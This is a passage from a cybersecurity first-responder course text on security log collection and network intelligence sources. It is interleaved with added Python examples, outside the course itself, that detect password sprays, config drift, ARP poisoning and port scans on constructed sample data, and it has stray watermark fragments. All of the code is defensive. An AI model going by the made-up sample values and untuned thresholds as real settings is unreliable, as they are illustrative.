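    print("password spray sources:", sprays)
    print("spray followed by success:", spray_then_success(AUTH_EVENTS, sprays))
    print("behavioral outliers:", behavioral_outliers(WITHDRAWALS))
```

Alice's two events from 10.0.5.17 never reach the threshold, which is the point: the rule is written against the cross-account pattern, not against any single failure, so ordinary mistakes do not page anyone.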

Guidelines for Deploying a Security Intelligence Collection and Analysis Platform

Note: All Guidelines for this lesson are available as checklists from the Checklist tile on the
CHOICE Course screen.

Follow these guidelines when deploying a security intelligence collection and analysis platform.

Determine Which Data to Collect for Security Intelligence
To determine which data you should include in your security intelligence collection process:
• Identify risks: Risk management should be a major part of your intelligence collection process.
Be sure to identify specific risks that will have an impact on your organization.
• Prioritize risks: As part of the risk management process, prioritize the risks. You will likely have
to make some decisions regarding which data you will collect and process, so knowing which
threats you need to focus on will help you plan.
• Identify potential data sources: Starting with the most critical risks and working your way
through the list, identify every source of information that would be affected by an attack—
before, during, and after the attack, within your systems and outside your systems, within the
network (such as devices like routers and firewalls) and within hosts (such as servers, clients, and
mobile devices). Consider existing sources, such as system logs, as well as sources you might
need to set up in advance, such as packet capture or logging devices.
• Narrow your focus: Review each data source and identify its value. Compare its value to the
cost of storage, processing, and analysis. Determine if the information is duplicated elsewhere at
a lesser cost or whether another source will provide an earlier warning or more useful
information. Select the information sources that meet your requirements. Identify the data
amount, frequency, and duration you need to capture to provide an optimum ratio of cost and
value.

Determine Which Fields You Should Log
In many cases, you can custom-configure logging tools to determine what sort of information is
logged. It is typically not feasible to capture everything possible, since it may seriously diminish the
processing speed and may fill logs too quickly. So you need to be selective. In general, you should
try to capture at least the five Ws:
• When the event started (and ended, if relevant), with the time zone or UTC offset recorded so
the entry can be lined up against logs from other hosts.
• Who was involved in the event.
• What happened, with specific detail to distinguish the nature of the event from other events,
including whether the action succeeded or failed.
• Where it happened—on which host, file system, network port, and so forth.
• Where the event originated (for example, a session initiated from an outside IP address over a
virtual private network [VPN] connection).

Configure Logging Systems Based on Their Impact
The NIST Special Publication 800-92, Guide to Computer Security Log Management, recommends that
you configure logging systems based on the priority of the systems they document, as described in
the example guidelines shown in this table. Some industry-specific regulations also provide
requirements on how long relevant data and logs should be held.

Note: Military organizations will often need to retain data for longer periods than what is listed in
this table.

Category                                   Low-Impact Systems          Moderate-Impact Systems     High-Impact Systems
How long to retain log data.               1 to 2 weeks                1 to 3 months               3 to 12 months
How often to rotate logs.                  Optional (if performed,     Every 6 to 24 hours or      Every 15 to 60 minutes or
                                           at least every week or      every 2 to 5 MB             every 0.5 to 1.0 MB
                                           every 25 MB)
If the organization requires the system    Every 3 to 24 hours         Every 15 to 60 minutes      At least every 5 minutes
to transfer log data to the log
management infrastructure, how
frequently that should be done.
How often log data needs to be analyzed    Every 1 to 7 days           Every 12 to 24 hours        At least 6 times a day
locally (through automated or manual
means).
Whether log file integrity checking        Optional                    Yes                         Yes
needs to be performed for rotated logs.
Whether rotated logs need to be            Optional                    Optional                    Yes
encrypted.

Determine Which Events Should Prompt an Alert
Some events should be captured because they indicate an attack currently taking place. Others
provide information that will be useful for investigating an attack or performing later forensic
analysis. As you configure your logging systems, identify which events should trigger an alert. This
table provides some examples, although your own criteria may vary.

Events That Should Trigger an Alert                    Events That Provide Useful Data for Later Analysis
Faults affecting system operations.                    General system status messages.
System changes that will result in a security or       General system changes.
availability problem.
Attacks that are successful.                           Attacks that fail, including reconnaissance probes.
Reconnaissance probes or attacks with a good           Low-impact probes and attacks.
chance of success.
Failed logins.                                         Any login.

A single failed login is rarely worth an alert on its own; most organizations alert on a threshold of
failures, or on the cross-account pattern described under Correlation analysis, and log the
individual failures for later analysis.

Note: Deciding how aggressive to be in creating alerts depends on how good your log analysis
tools are and how much space you have to store logs, as well as policy and regulatory
requirements.


ACTIVITY 7-1
Deploying a Security Intelligence Collection and
Analysis Platform

e
Scenario

ut
As of now, Develetech's intelligence collection and analysis efforts are not well unified, which has let
certain incidents slip past its defenses. Upper management is not pleased with the consequences of
these incidents. So, the Chief Information Security Officer (CISO) of Develetech wants to develop a

ib
new collection and analysis platform that will enable the security team to extract more useful,
actionable data from its assets. This will hopefully improve the process and bolster the security

tr
team's ability to protect the business. However, the CISO needs your help in developing the
platform.

Activity: Deploying a Security Intelligence Collection and Analysis Platform

1. The CISO is trying to convince other C-level personnel that Develetech needs
to put an end to reactive security and start adopting a more proactive
approach to defending the organization.
What are the advantages of CSM that could convince management to offer
their financial backing?
A: Answers may vary, but with CSM, the organization is able to constantly survey all of its assets for
any behavior that induces risk. Data collected on this behavior is both up to date and actionable;
problems are detected immediately, and can likewise be contained as quickly as possible to
minimize damage. These CSM systems can also be configured and customized to suit the
organization's needs, even as business operations or the threat landscape change. Ultimately, a
CSM can drastically reduce the risk of an attack going unidentified for a long period of time due to
stagnant collection processes.

2. The CISO would also like your input as far as which data sources to draw
from as part of the new collection platform.
What steps would you take to determine which sources to choose for data
collection?
A: Answers may vary, but the organization should first identify the major risks it faces. The risk
assessment team then needs to prioritize those risks by measuring the most likely risks against
the risks that will cause the most damage. This will enable the intelligence collection team to focus
on data that is most relevant to mitigating those risks. The collection team will review these
relevant data sources for components like alerts, logs, captures, etc., that can provide insight into
the risk. Lastly, the collection team will narrow their focus to the most actionable data, and attempt
to eliminate redundant data or data that does not provide optimal value.

3. When it comes to processing disparate types of data, what challenges will the
collection and analysis platform face?
A: Answers may vary. Log files come in many different formats based on different standards—or
sometimes, no standards at all. Log files can be generated in CSV format, syslog format, XML,
and much more. Some formats are open source and easy to work with, whereas some are
proprietary and require specific software. Logs may also be encoded using different schemes,
such as ANSI versus Unicode. The time-keeping element of an appliance may not be
synchronized with other appliances, making it difficult to correlate data based on a time factor.
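The challenges in the answer above (mixed syslog, CSV and XML formats, devices logging in different time zones, and clocks that are not synchronized) are what a collection platform's normalization stage has to absorb. The following is an added example, not part of the course materials: it parses one constructed record in each of the three formats into a common schema, attaches a per-device time zone to naive timestamps, corrects a known clock skew, and orders the events on the corrected UTC clock. The sample lines, the device names, the `DEVICE_TZ` zone table and the `CLOCK_SKEW` table are all constructed for this example.

```python
import csv
import io
import re
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta, timezone

# Constructed sample records (not from any real device), one per format:
# RFC 5424 syslog, a proxy CSV row logged in local time, and an XML IDS event.
SAMPLE_LINES = [
    "<34>1 2024-03-05T14:02:11+02:00 fw01 kernel - - - DROP TCP 203.0.113.9 -> 10.0.0.5:22",
    "2024-03-05 07:02:15,proxy01,allow,10.0.0.5,example.test",
    '<event ts="2024-03-05T12:02:20Z" host="ids01" action="alert">port scan from 203.0.113.9</event>',
]

# Assumptions an analyst records per source: the zone a device uses when it logs
# naive local time (EST here) and any measured skew (device time minus true time).
DEVICE_TZ = {"proxy01": timezone(timedelta(hours=-5))}
CLOCK_SKEW = {"ids01": timedelta(seconds=10)}

SYSLOG_RE = re.compile(
    r"^<(?P<pri>\d+)>1 (?P<ts>\S+) (?P<host>\S+) (?P<app>\S+) \S+ \S+ \S+ (?P<msg>.*)$")


def to_utc(ts, host):
    """Attach the device's zone to a naive timestamp, convert to UTC, undo known skew."""
    if ts.tzinfo is None:
        ts = ts.replace(tzinfo=DEVICE_TZ.get(host, timezone.utc))
    return ts.astimezone(timezone.utc) - CLOCK_SKEW.get(host, timedelta(0))


def parse_syslog(line):
    m = SYSLOG_RE.match(line)
    if not m:
        raise ValueError("not an RFC 5424 syslog line")
    pri = int(m["pri"])                      # PRI encodes facility*8 + severity
    ts = datetime.fromisoformat(m["ts"].replace("Z", "+00:00"))
    return {"format": "syslog", "source": m["host"], "time": to_utc(ts, m["host"]),
            "facility": pri // 8, "severity": pri % 8,
            "action": m["msg"].split()[0].lower(), "message": m["msg"]}


def parse_csv(line):
    ts_s, host, action, client, dest = next(csv.reader(io.StringIO(line)))
    ts = datetime.strptime(ts_s, "%Y-%m-%d %H:%M:%S")   # naive: device-local time
    return {"format": "csv", "source": host, "time": to_utc(ts, host), "facility": None,
            "severity": None, "action": action.lower(), "message": f"{client} -> {dest}"}


def parse_xml(line):
    el = ET.fromstring(line)
    host = el.get("host")
    ts = datetime.fromisoformat(el.get("ts").replace("Z", "+00:00"))
    return {"format": "xml", "source": host, "time": to_utc(ts, host), "facility": None,
            "severity": None, "action": el.get("action", "").lower(), "message": el.text or ""}


def normalize(line):
    """Dispatch on the shape of the line; an unknown shape is an error, never silently dropped."""
    if line.startswith("<event"):
        return parse_xml(line)
    if re.match(r"^<\d+>", line):
        return parse_syslog(line)
    if line.count(",") >= 4:
        return parse_csv(line)
    raise ValueError(f"unrecognized log format: {line[:40]!r}")


def normalize_all(lines):
    """Normalize every line and order the result on the corrected UTC clock."""
    return sorted((normalize(l) for l in lines), key=lambda r: r["time"])


if __name__ == "__main__":
    for rec in normalize_all(SAMPLE_LINES):
        print(rec["time"].isoformat(), rec["source"], rec["action"], rec["message"])
```

Note that the raw order of the three lines (firewall, proxy, IDS) is not the order in which the events happened: once the IDS clock's 10-second lead is removed, its alert is the earliest event. Correlating on uncorrected timestamps would have put the alert after the firewall drop it preceded.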

Lesson 7: Collecting Cybersecurity Intelligence | Topic A


286 | CyberSec First Responder® (Exam CFR-410)

TOPIC B
Collect Data from Network-Based Intelligence Sources
You've deployed various elements in a security intelligence collection and analysis platform, which
will help you organize and analyze large volumes of potentially useful data. Now you can begin
collecting intelligence from network resources.

Network Device Configuration Files

Network devices like routers and switches can often be configured through the use of discrete files.
These files provide a static baseline for a device's behavior, and they can also act as a backup in case
the device needs to be reset or is taken offline. Configuration files may be stored locally on the
device, but they can also be stored on a server that a management console uses to deploy
configuration changes to all affected devices. In either case, these configuration files can provide you
with useful data about the device's behavior.

For example, a router's configuration file can include its internal IP address, wide area network
(WAN) IP address, virtual local area network (VLAN) information, security services (proxies, filters,
firewalls, etc.), and much more. In the event of a security incident, this information can be valuable
as you correlate a device's settings with suspicious traffic. A lapse in the device's firewall, for
instance, may help you understand why the traffic was able to pass through the router unabated and
onto hosts in the subnet. What's more, an attacker could attempt to adjust these configuration files
directly. By collecting data about this modification, including timing and differences from the
baseline, you can help identify the attacker's goals or planned vectors of attack.

Figure 7-3: Part of a router's configuration file. Note how it sets specific behavior, like its WAN
address.
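The paragraph above describes using a configuration file as a static baseline and collecting "differences from the baseline" when a device is modified. The following is an added example (not from the course or from any vendor's tooling) of that comparison: it diffs a constructed baseline configuration against a constructed current copy, rates each changed line by whether it touches an access control, NAT, routing or credential keyword, and pulls the per-interface addresses an analyst would correlate with traffic. The two configuration excerpts and the `HIGH_RISK` keyword list are assumptions made for this example.

```python
import difflib

# Constructed baseline and current configuration excerpts (not from any real router).
BASELINE = """\
hostname edge-rtr
interface GigabitEthernet0/0
 description WAN
 ip address 198.51.100.2 255.255.255.252
 ip access-group WAN-IN in
interface GigabitEthernet0/1
 description LAN
 ip address 10.0.0.1 255.255.255.0
ip access-list extended WAN-IN
 deny ip any any log
"""
CURRENT = """\
hostname edge-rtr
interface GigabitEthernet0/0
 description WAN
 ip address 198.51.100.2 255.255.255.252
interface GigabitEthernet0/1
 description LAN
 ip address 10.0.0.1 255.255.255.0
ip access-list extended WAN-IN
 permit tcp any any eq 3389
 deny ip any any log
"""

# Keywords whose change most often matters in an incident (an assumed list, extend per platform).
HIGH_RISK = ("access-group", "access-list", "permit", "deny", "ip nat", "ip route",
             "snmp-server", "username", "enable secret")


def config_drift(baseline: str, current: str):
    """Return (severity, change_type, line) for every line that differs from the baseline."""
    findings = []
    # n=0: only the changed lines, no surrounding context; [2:] drops the file-name headers.
    diff = list(difflib.unified_diff(baseline.splitlines(), current.splitlines(),
                                     lineterm="", n=0))[2:]
    for line in diff:
        if line.startswith("@@"):
            continue
        change = "added" if line[0] == "+" else "removed"
        text = line[1:].strip()
        severity = "high" if any(k in text for k in HIGH_RISK) else "info"
        findings.append((severity, change, text))
    return findings


def interface_addresses(config: str):
    """Map interface name -> configured IP address, the static facts to correlate with traffic."""
    result, iface = {}, None
    for line in config.splitlines():
        if line.startswith("interface "):
            iface = line.split(None, 1)[1]
        elif iface and line.strip().startswith("ip address "):
            result[iface] = line.split()[2]
    return result


if __name__ == "__main__":
    for severity, change, text in config_drift(BASELINE, CURRENT):
        print(f"[{severity}] {change}: {text}")
    print(interface_addresses(CURRENT))
```

In the constructed sample the inbound filter was detached from the WAN interface and a permit for TCP 3389 was inserted ahead of the final deny; both lines are reported as high-severity drift, which is exactly the kind of "lapse in the device's firewall" the text says explains otherwise puzzling traffic.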


Network Device State Data

A network device's state data also prescribes its behavior, but it is typically not manually configured.
State data is mostly driven by the device's inherent behavior, like a switch always keeping
content-addressable memory (CAM) tables to funnel traffic to a specific destination. Still, attackers may be
able to adjust this data to facilitate easier network traversal, like through a pivot or by moving
laterally. The following table lists some of the most important elements that record state data on
network devices.

State Data Element: Description

• Routing tables: Routing tables include destination addresses, the gateway required to
reach those destinations, the local interface that communicates with the
gateway, and metrics that measure the efficiency of each route. A
suspiciously configured route can help you identify an attack. For
example, a routing table that takes excessively long paths could consume
network bandwidth and cause delays to disrupt service.
• CAM tables: CAM tables are used by switches to forward packets to specific interfaces
rather than broadcasting traffic to all destinations as in a hub. They
essentially map MAC addresses to ports. An attacker connected to the
switch may be able to alter the CAM table to funnel all traffic to their
device, effectively acting as a man in the middle.
• NAT tables: Network address translation (NAT)-enabled routers contain tables that
map private IP addresses to the public address, as well as TCP and UDP
ports. This enables outgoing transmissions to use the public address and
incoming transmissions to find the correct private address it originated
from. Therefore, a NAT table can help you determine if communications
from internal to external, or vice versa, are being tampered with.
• DNS cache: Domain Name System (DNS) caches improve the efficiency of name
servers in that they reduce the overhead of constant resolution requests.
The cache stores an IP address and its corresponding domain name for
easy retrieval. DNS cache data may point to malicious entries.
• ARP cache: As you've seen, the Address Resolution Protocol (ARP) cache maps
internal IP addresses to MAC addresses. Multiple IP addresses matched
to a single MAC address can indicate a poisoning attempt.

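The ARP and CAM rows of the table above each name a concrete indicator: several IP addresses resolving to one MAC address, and a switch port mapping that has been altered. The following is an added example, not part of the course, of checking exported state data for those indicators. `ARP_CACHE`, `CAM_TABLE` and the known-good `CAM_BASELINE` are constructed values; a real collection job would pull them from the device over SNMP, SSH or the management console.

```python
from collections import defaultdict

# Constructed ARP cache entries (ip, mac) as exported from a gateway; not real data.
ARP_CACHE = [
    ("10.0.0.1", "00:11:22:33:44:01"),
    ("10.0.0.5", "00:11:22:33:44:05"),
    ("10.0.0.9", "00:11:22:33:44:09"),
    ("10.0.0.1", "de:ad:be:ef:00:01"),   # gateway IP now also answered by a second MAC
    ("10.0.0.7", "de:ad:be:ef:00:01"),   # same MAC also claims another host's IP
]

# Constructed switch CAM table entries (mac, port) and the port each MAC was
# learned on during a known-good baseline period.
CAM_TABLE = [
    ("00:11:22:33:44:01", "Gi1/0/24"),
    ("00:11:22:33:44:05", "Gi1/0/5"),
    ("de:ad:be:ef:00:01", "Gi1/0/24"),
]
CAM_BASELINE = {"00:11:22:33:44:01": "Gi1/0/1", "00:11:22:33:44:05": "Gi1/0/5"}


def arp_anomalies(cache):
    """Report MACs that claim several IPs (the table's indicator) and IPs claimed by several MACs."""
    by_mac, by_ip = defaultdict(set), defaultdict(set)
    for ip, mac in cache:
        by_mac[mac.lower()].add(ip)
        by_ip[ip].add(mac.lower())
    return {
        "shared_mac": {m: sorted(ips) for m, ips in by_mac.items() if len(ips) > 1},
        "conflicting_ip": {ip: sorted(macs) for ip, macs in by_ip.items() if len(macs) > 1},
    }


def cam_moves(table, baseline):
    """MACs that the switch now sees on a different port than during the baseline."""
    return sorted((mac, baseline[mac], port) for mac, port in table
                  if mac in baseline and baseline[mac] != port)


def cam_newcomers(table, baseline):
    """MACs present in the CAM table that were never seen during the baseline."""
    return sorted(mac for mac, _ in table if mac not in baseline)


if __name__ == "__main__":
    print(arp_anomalies(ARP_CACHE))
    print(cam_moves(CAM_TABLE, CAM_BASELINE))
    print(cam_newcomers(CAM_TABLE, CAM_BASELINE))
```

In the sample, one unknown MAC answers for both the gateway address and a workstation address, and the gateway's own MAC has moved from its baseline port to the same port the unknown MAC was learned on; together these are the ARP poisoning and CAM manipulation signs the table describes. A MAC-to-port move on its own can be benign (a laptop re-plugged), which is why the baseline comparison is reported separately from the ARP conflict.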
Switch and Router Logs

Switches and routers can log both incoming and outgoing traffic. You can typically control the
verbosity of these logs, including filtering on specific actions (e.g., dropped and accepted
connections). Most routers/switches will at the very least include the destination address and source
address as part of the transmissions. These devices may also record the following information:
• The protocol used in the transmission.
• The port number or service name used in the transmission.
• Whether the transmission was dropped, accepted, or rejected.
• The priority metric of each transmission.
• The time of transmission.

Because switches and routers serve a great deal of traffic in a network, it can be difficult to find
useful or actionable information in their logs that can't also be found with more specialized devices.
Nevertheless, they can still provide you with a holistic view of traffic that is both inbound and
outbound from the key communication points in your network. In many organizations, switch and
router activity is centralized rather than written to separate log files on each device, as the number of
such devices can make it infeasible to examine individual logs.

Figure 7-4: A router's log for incoming traffic.
Note: Monitoring capabilities may differ in some router and switch deployments—some may
not monitor traffic at all.

Wireless Device Logs

Wireless devices like wireless access points (WAPs) are not necessarily routers, but their logging
information often reflects a similar type and amount of traffic. The main difference is that some
WAPs also record wireless-specific information, like the channel and frequency used during
communication. This can help administrators diagnose interference, noise, or coverage problems.
Likewise, collecting this wireless data can assist security personnel in identifying service disruption
attacks, as wireless networking is less stable than wired networking and may be more vulnerable to
denial of service (DoS) conditions.

In large organizations, WAPs are often managed through the use of wireless local area network
(WLAN) controllers. These controllers are able to configure the behavior of individual access points
or all access points as a whole. Controllers are often integrated with Linux servers to output WAP
events as syslog data. For example, Cisco controllers enable you to specify multiple syslog servers
for output, and you can specify that certain messages are sent to certain servers. One administrator
may be tasked with reviewing logs with property A, and another administrator may be tasked with
reviewing logs with property B. The format of these logs follows the format of traditional Linux
syslogs, including a facility code and severity level for each message.

Note: Linux syslogs are discussed in the next topic.

Firewall Logs

Firewalls provide a line of defense at the network's borders to limit the types of traffic permitted to
pass in to (and possibly out of) the network based on certain rules or behavior. Because firewalls
provide such an important line of defense where a network may be most vulnerable, firewall logs
can provide a wide range of useful security intelligence, such as:

• Connections permitted or denied: Patterns within log data can help you identify holes in your
security policies. A sudden increase in rates resulting in denied traffic can reveal when attacks
were committed against your firewall.
• IDS activity: Configure the firewall with a set of IDS signatures to log attacks that occur.
• Address translation audit trail: Log network address translation (NAT) or port address
translation (PAT) to provide useful forensic data, which can help you trace the IP address of an
internal user that was conducting attacks on the outside world from inside your network.
• User activity: Produce an audit trail of security policy changes by logging firewall user
authentication and command usage.
• Cut-through-proxy activity: Log activity as end users authenticate and pass through the firewall
to produce an audit trail of cut-through-proxy use.
• Bandwidth usage: Log each connection with its duration and traffic volume usage, which you
can break down by connection, user, department, and other factors.
• Protocol usage: Log protocols and port numbers that are used for each connection, which you
can analyze statistically for patterns or anomalies.

Because firewalls collect a large volume of data, you should employ a log collection tool to ensure
that data is not lost when logs roll over or are cleared within the firewall.

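The first bullet above says that a sudden rise in the rate of denied connections reveals when a firewall was attacked, and the router/switch section earlier notes that these devices record at least source, destination, action and time. The following is an added example, not from the course, of turning those fields into that signal: it parses constructed firewall log lines, counts denied connections per source in fixed time windows, flags sources that cross a threshold, and lists the distinct ports each denied source touched (breadth across ports being the usual scan indicator). The log format, the window length and the threshold are all assumptions made for this example; real devices use their own field layouts.

```python
from collections import defaultdict
from datetime import datetime, timezone

# Constructed firewall log lines (time action proto src dst dport); not from a real device.
FIREWALL_LOG = """\
2024-03-05T12:00:01Z ACCEPT TCP 10.0.0.5 198.51.100.20 443
2024-03-05T12:00:04Z DENY TCP 203.0.113.9 10.0.0.5 21
2024-03-05T12:00:05Z DENY TCP 203.0.113.9 10.0.0.5 22
2024-03-05T12:00:06Z DENY TCP 203.0.113.9 10.0.0.5 23
2024-03-05T12:00:07Z DENY TCP 203.0.113.9 10.0.0.5 25
2024-03-05T12:00:09Z DENY TCP 203.0.113.9 10.0.0.5 80
2024-03-05T12:00:12Z DENY TCP 203.0.113.9 10.0.0.5 3389
2024-03-05T12:00:30Z DENY UDP 192.0.2.7 10.0.0.5 161
2024-03-05T12:00:45Z ACCEPT TCP 10.0.0.7 198.51.100.20 443
2024-03-05T12:01:03Z DENY TCP 203.0.113.9 10.0.0.5 445
2024-03-05T12:01:20Z DENY TCP 203.0.113.9 10.0.0.5 8080
2024-03-05T12:01:40Z ACCEPT TCP 10.0.0.5 198.51.100.21 443
"""


def parse(lines):
    """Yield one dict per non-empty line; timestamps become UTC epoch seconds."""
    for line in lines.splitlines():
        if not line.strip():
            continue
        ts, action, proto, src, dst, dport = line.split()
        epoch = int(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
                    .replace(tzinfo=timezone.utc).timestamp())
        yield {"epoch": epoch, "action": action, "proto": proto,
               "src": src, "dst": dst, "dport": int(dport)}


def bucket(epoch, window_s):
    """Start of the fixed window containing `epoch`, as an ISO string for reporting."""
    start = epoch - epoch % window_s
    return datetime.fromtimestamp(start, timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")


def denied_spikes(lines, window_s=60, threshold=5):
    """(window, source, count) for every source denied at least `threshold` times in a window."""
    counts = defaultdict(int)
    for ev in parse(lines):
        if ev["action"] == "DENY":
            counts[(bucket(ev["epoch"], window_s), ev["src"])] += 1
    return sorted((w, src, n) for (w, src), n in counts.items() if n >= threshold)


def ports_probed(lines):
    """Distinct destination ports each source was denied on; breadth suggests a scan."""
    ports = defaultdict(set)
    for ev in parse(lines):
        if ev["action"] == "DENY":
            ports[ev["src"]].add(ev["dport"])
    return {src: sorted(p) for src, p in ports.items()}


def action_summary(lines):
    """Overall accept/deny counts, the first thing to sanity-check against the firewall's own stats."""
    summary = defaultdict(int)
    for ev in parse(lines):
        summary[ev["action"]] += 1
    return dict(summary)


if __name__ == "__main__":
    print(action_summary(FIREWALL_LOG))
    print(denied_spikes(FIREWALL_LOG))
    print(ports_probed(FIREWALL_LOG))
```

The threshold and window should be tuned per segment: a border firewall legitimately denies far more per minute than an internal one, so the same numbers would either flood you with alerts or miss the spike entirely.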
Figure 7-5: Windows Firewall logging a ping event.

NGFWs
Next-generation firewalls (NGFWs) are modern firewalls that can function at higher layers of the
Open Systems Interconnection (OSI) model than traditional firewalls. Most NGFWs work all the
way up to layer 7, the application layer. This provides NGFWs with deeper inspection capabilities so
they can detect and block specific unwanted traffic, rather than blocking an entire port, protocol, or
source and destination otherwise used for legitimate purposes. Some NGFWs also incorporate
machine learning for more intelligent, data-driven analysis.

Some examples of NGFWs include the Cisco Firepower® series, Palo Alto Networks® next-
generation firewalls, and Check Point® Next Generation Firewall.

Web Application Firewall (WAF) Logs

A web application firewall (WAF) is an application-layer firewall that can apply a set of rules to
HTTP traffic. These rules generally address web-based exploits and vulnerabilities, like SQL
injection attacks and cross-site scripting (XSS) attacks. Thus, a WAF is a more intelligent version of
the traditional firewall, and can protect web servers and clients from malicious traffic that fits known
attack signatures.

WAF logs are usually set to record an event when it trips a certain rule. Whether or not this means
the traffic is blocked is up to the administrator to configure.
Traffic that matches a suspicious or unwanted signature will typically be logged with the source and
destination addresses, why the traffic triggered an alert (what known suspicious behavior it
matched), and what action was taken (based on the configured rule).
The actual composition of the log will differ between WAF vendors, but some also include the
following useful information:
• The time of the event.
• The severity of the event. Not all events that trigger an alert are treated with equal suspicion.
• The HTTP method(s) used in the event (e.g., a GET request).
• Any specific query used in the event.
• The specific web page path of the traffic.
• More details about what kind of attack, if any, the event could indicate.

WAF Solutions

Examples of WAFs include:

• NAXSI: An open source solution for Unix-like systems that relies on simple rules to block the
most common types of web-based exploits.
• ModSecurity™: An open source solution for Linux and Windows systems. Trustwave®, the
company that maintains ModSecurity, offers a core rule set for free, but also offers a paid service
of robust and constantly updated rules.
• Imperva® Web Application Firewall: A proprietary solution for Windows systems. This
solution correlates a baseline of your normal web apps' behaviors with crowd-sourced threat
intelligence to determine the types of traffic to block.
e
IDS/IPS Logs

Intrusion detection systems/intrusion prevention systems (IDSs/IPSs), whether wireless (WIDS/
WIPS) or otherwise, usually have a built-in logging feature that records traffic and alerts according
to how the system is configured. You should configure the system to at least log any alerts that it
generates, without logging every single non-alert event it detects. Logs can vary depending on what
signatures you've told the IDS/IPS to generate an alert from. If all the IDS does is look for port
scans, then your log will be very brief and to the point. If your IDS/IPS scans many different
potential threats, then your log might become more difficult to wade through.

Figure 7-6: An IDS log indicating a port scan alert.

To help standardize alert information, the Security Device Event Exchange (SDEE) server is an
IDS alert format and transport protocol specification based on the Simple Object Access Protocol
(SOAP). Because it is based on SOAP, SDEE uses common web protocols (such as HTTP/HTTPS
and XML) to communicate between different types of systems, such as a Cisco device and a
Windows or Linux log collection application. While SDEE provides standard types of security
events, and filters select events to be retrieved from SDEE providers, the standard supports
extensions so devices can provide additional types of events and filters, while remaining compatible
with the overall messaging scheme.
Systems that transmit security event data to clients are called SDEE providers. The provider is
typically an IDS. SDEE providers act as HTTP servers, whereas systems that request information
from the provider (such as a log collection application) are clients. Clients initiate HTTP requests.
As with any type of web client, the SDEE client establishes a session with the server by
authenticating. Once authenticated, an ID (or a cookie, essentially) is provided to the client to verify
future requests, enabling a client to maintain a session state with the server. Through SDEE,
security events may be retrieved through two methods: an event query (a single request), or an event
subscription (an ongoing feed of events). Communication may be conducted over HTTP with
Secure Sockets Layer/Transport Layer Security (SSL/TLS), using an implementation such as
OpenSSL.

IDS/IPS Solutions

Examples of IDS/IPS solutions include:

• Snort®: An open source IDS/IPS currently developed by Cisco that is available for Linux and
Windows systems. You can configure Snort to detect and block network traffic that matches
your own custom rule set.
• Zeek IDS: An open source network monitor for Unix-based systems that can function as a
network intrusion detection system/host-based intrusion detection system (NIDS/HIDS),
among other features. Zeek IDS, formerly known as Bro, includes a custom scripting language
that enables you to set detection rules and action policies.
• Cisco Firepower: Proprietary network security software that runs on Firepower physical
appliances. In addition to being an NGFW and anti-malware solution, Cisco markets Firepower
as a next-generation IDS/IPS enhanced by full-stack visibility and contextual awareness.
• Suricata: A cross-platform open source IDS/IPS solution that also supports logging of DNS,
HTTP, and SSL/TLS activity. Suricata comes with its own rule set language, but also supports
more advanced scripting with the Lua programming language.
lic

Endpoint Detection and Response (EDR) Logs

Endpoint detection and response (EDR) systems monitor various hosts on a network (i.e.,
endpoints) for malicious or other unwanted behavior, and then take action to protect the host(s)
against this behavior. As mentioned previously, EDR is similar to host-based intrusion detection,
but tends to incorporate more advanced analysis techniques (e.g., trend analysis, heuristics, etc.) as it
monitors an endpoint. In some EDR solutions, these advanced techniques do not replace older
signature-based analysis, but supplement it.

Note: EDR can be considered a host-based intelligence source, but because data is sent to a
centralized monitoring platform over the network, it's being discussed in the network-based
intelligence sources topic.

EDR systems are typically agent based; specialized software is deployed on each endpoint the
security team wishes to monitor. This agent software collects and reports data to a centralized EDR
platform where it can be analyzed. If the EDR system determines an endpoint is exhibiting
unwanted behavior, the EDR system can send alerts to an administrator at a dashboard or to the
user of that endpoint. Some EDR systems can take direct action and send commands to the
endpoint in real time, like shutting it down or disconnecting its network interface to isolate an
infection.

EDR is a relatively recent term and at times somewhat vague. Solutions from different vendors can
vary significantly in what they do and how they do it. Still, there are some common types of host
activity that all-in-one EDR solutions tend to log, including:
• Information about running software processes.
• Network traffic patterns.
• Account login activity.
• Changes to the OS file system, configuration files, and Registry.
• Memory management and kernel operation.
• Alterations made to sensitive files.

Note: The log files produced by the EDR system are usually more complex than what the host
provides directly. For example, instead of simply recording each time a process starts and stops,
the EDR log will probably include event correlations and other relevant analytics data, like how
changes to a Registry entry affected a running process.

Proxy Logs

When used in an organizational setting, web proxies act on behalf of internal employees by
forwarding their HTTP requests to the intended destination. This is often implemented in
environments where traffic outbound for the Internet needs to comply with some administrative or
security policy. In addition, proxies can reveal the exact nature of HTTP requests, including the
websites that users visit and the contents of each request. They're also useful for preventing users
from contacting known sources of malware, even if inadvertently.

Proxy logs can reveal quite a bit about each and every request and response that passes through the
proxy, including:
• The time of the request/response.
• The destination website.
• The internal IP address that made the request or is the recipient of the response.
• The HTTP method used in the request/response.
• The exact destination path of the request.
• The length and MIME type of the request.
• The exact contents of the request/response.

Proxies set up to intercept or block traffic can also record the rule that a request matched when it
was either halted or denied. An administrator or security professional can use this information to
determine an employee's intent, be it malicious or harmless.


lic
up
D
ot
N
o

Figure 7-7: A proxy log.


Cloud Provider Logs

One of the major issues that comes with relying on a cloud service provider for software, platform,
or infrastructure needs is that you don't have a complete view into how these assets are operating.
This is the reality that comes with no longer having total control over the process or product that
you've offloaded to a third party. However, in most cases, your organization will reach an agreement
with a cloud provider that defines what types of information the provider will share, and what form
this information takes.
Many providers will, at the very least, offer audit logs to their clients. The extensiveness and
usefulness of these logs may vary, but in general, cloud audit logs enable a client organization to
verify information, such as administrative account activity (logins, service configurations, etc.) and
use of the cloud service's application programming interface (API) (automated database reads/
writes, automated deployments, etc.). Using these audit logs, you can identify any abnormal behavior
with regard to a cloud service and discover the who, what, and when of an event.

In addition, some providers offer general security bulletins that may be of interest to their clients.
This can include everything from reporting on infrastructure security fixes, to generating reports of
suspected breaches that may impact all or specific clients. These security bulletins are typically
published on the service's official blog, sent out through mass email to clients, or made visible
through clients' central administrative consoles. In addition, cloud providers may also offer threat
intelligence feeds that report on suspected threats targeting cloud services at any given time. Like
more generalized threat intelligence feeds, feeds published by cloud providers can also incorporate
automated scoring mechanisms and other information that might influence an organization's
response.

is
Software-Defined Networking (SDN)

Software-defined networking (SDN) is an attempt to simplify the process of administrating a
network by separating systems that control where traffic is sent from systems that actually forward
this traffic to its destination. This enables a network administrator to directly program the control
systems without needing to also focus on the forwarding systems. Network administrators can more
easily manage the flow and logistics of their network, and adjust traffic on the fly based on their
needs.
SDN can assist the data collection process by gathering statistics from the forwarding systems and
